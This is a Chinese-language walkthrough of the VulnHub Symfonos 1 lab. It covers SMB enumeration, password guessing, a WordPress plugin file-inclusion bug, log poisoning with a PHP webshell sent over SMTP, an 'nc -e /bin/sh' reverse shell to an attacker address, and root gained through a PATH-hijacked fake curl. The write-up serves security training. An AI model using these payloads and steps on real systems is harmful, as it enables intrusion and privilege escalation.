https://www.vulnhub.com/entry/symfonos-1,322/
nat网络
arp-scan -l 比平常多出来的ip就是靶机了
nmap
22要想到可能的ssh登录
25想到邮件服务,枚举用户或进去查看&伪造内容,等
80是web搜集信息
139 445 想到smb查看敏感内容
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
| 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after: 2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:EF:01:A1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos
| NetBIOS computer name: SYMFONOS\x00
| Domain name: \x00
| FQDN: symfonos
|_ System time: 2020-04-26T01:45:11-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-26T06:45:11
|_ start_date: N/A
有smb可以先看看smb
继续扫
enum4linux -a 192.168.189.205
看到两个目录,当然先看anonymous这个是匿名不要密码的
smbclient -N //192.168.189.205/anonymous
找到文件,发现提示,说密码太弱,总是这三个
可以猜测另一个用户helios的密码是不是这三个之中的一个
登录它的smb
smbclient -U "helios" //192.168.189.205/helios
测试输入qwerty可以登录
查看文件,找到新目录提示
然后网页80打开这个新目录
又看到写的another WordPress之类的,当然这又是靠WordPress博客漏洞了
要立马想到wpscan扫一扫看一看,要么扫用户,要么扫插件之类的
wpscan --url http://192.168.189.205/h3l105/ --plugins-detection aggressive
发现这个插件有感叹号提示说什么什么功能被打开了,
网上搜此插件漏洞
https://www.exploit-db.com/exploits/40290
根据底下的LFI提示来
http://192.168.189.205/h3l105//wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
存在漏洞
但是passwd这个LFI是不够用的,还要想到其他敏感目录
我们之前的25端口还没用。而邮件的路径默认在/var/mail/. 那么这个helios的邮件目录应该在/var/mail/helios
测试
http://192.168.189.205/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios
果然有
25是打开的,还可以伪造邮件,邮件里插弹shell代码,然后我再用这个LFI来读取邮件执行。
telnet 192.168.189.205 25
MAIL FROM: 666
RCPT TO: helios
data
<?php system($_GET['666']); ?>
.
QUIT
发送完毕,再到LFI里执行,先看看id命令
http://192.168.189.205/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&666=id
成功,最下面显示了id
把id换成 弹shell到你IP地址和端口4444或其他端口的命令 nc -e /bin/sh 192.168.xxx.xxxx 4444
。
就收到了shell了
变tty : python -c 'import pty; pty.spawn("/bin/bash")'
老套路linpeas.sh自动扫
没发现明显提示,但suid这个里面有个平常看不到的可疑文件
试试执行它,发现内容很像curl命令后的内容,curl用多了就很容易发现
helios@symfonos:/$ /opt/statuscheck
HTTP/1.1 200 OK
Date: Sun, 26 Apr 2020 07:23:09 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Sat, 29 Jun 2019 00:38:05 GMT
ETag: "148-58c6b9bb3bc5b"
Accept-Ranges: bytes
Content-Length: 328
Vary: Accept-Encoding
Content-Type: text/html
file看是啥,是程序
helios@symfonos:/opt$ file statuscheck
statuscheck: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=4dc315d863d033acbe07b2bfc6b5b2e72406bea4, not stripped
靶机传到本机
nc 192.168.xxx.xxx 443 < statuscheck
本机接收
nc -nlvp 443 > s
ltrace看程序的内部call
C:\root> ltrace ./s
system("curl -I http://localhost"HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.17
Date: Sun, 26 Apr 2020 07:26:38 GMT
Content-type: text/html; charset=UTF-8
Content-Length: 5044
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
+++ exited (status 0) +++
果然是内部执行着curl命令
既然suid是以root身份的高敏感权限
我可以想办法利用环境变量改造curl。
真curl,一般在usr bin 下, 可以which curl
查看
但我可以在假curl里放我的恶意代码,root在 调用curl时,因为环境变量的原因,使用的并不是真正的环境里的curl,而是我的假curl
首先当然是再tmp里伪造,在这里我有高权限
伪造/bin/sh 提权命令 ,命名为curl
给予他执行权
改环境变量
实际上再执行,执行的是我tmp里的这个curl了
cd tmp
echo "/bin/sh" > curl
chmod 777 curl
export PATH=/tmp:$PATH
echo $PATH
/opt/statuscheck
成功root,也可以看到,curl的环境被我改了,调用的是我tmp里的假curl